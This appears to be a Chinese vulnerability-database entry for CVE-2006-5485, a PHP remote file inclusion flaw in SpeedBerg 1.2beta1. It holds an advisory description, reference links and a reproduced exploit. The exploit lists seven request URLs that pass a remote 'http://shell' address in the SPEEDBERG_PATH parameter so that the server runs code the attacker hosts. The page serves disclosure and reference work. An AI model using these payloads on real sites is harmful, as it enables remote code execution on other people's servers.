SpeedBerg SPEEDBERG_PATH多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111353 漏洞类型 输入验证
发布时间 2006-10-22 更新时间 2006-10-26
CVE编号 CVE-2006-5485 CNNVD-ID CNNVD-200610-387
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2615
https://cxsecurity.com/issue/WLB-2006100124
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-387
|漏洞详情
SpeedBerg1.2beta1存在多个PHP远程文件包含漏洞,远程攻击者可以通过(1)entrancePage.tpl.php,(2)generalToolBox.tlb.php,(3)myToolBox.tlb.php,(4)scriplet.inc.php,(5)simplePage.tpl.php,(6)speedberg.class.php和(7)standardPage.tpl.php的SPEEDBERG_PATH参数中的URL来执行任意PHP代码。
|漏洞EXP
########################################################################
# speedberg <= 1.2beta1  Remote File Inclusion
# Download Source :
http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
entrancePage.tpl.php
generalToolBox.tlb.php
myToolBox.tlb.php
scriplet.inc.php
simplePage.tpl.php
speedberg.class.php
standardPage.tpl.php
########################################################################
exploit;
http://localhost/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://localhost/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

# milw0rm.com [2006-10-22]
|参考资料

来源:BID
名称:20670
链接:http://www.securityfocus.com/bid/20670
来源:BUGTRAQ
名称:20061022speedberg<=1.2beta1RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/449468/100/0/threaded
来源:VIM
名称:20061023SourceVERIFY-speedbergRFI
链接:http://www.attrition.org/pipermail/vim/2006-October/001091.html
来源:XF
名称:speedberg-speedberg-file-include(29699)
链接:http://xforce.iss.net/xforce/xfdb/29699
来源:SREASON
名称:1762
链接:http://securityreason.com/securityalert/1762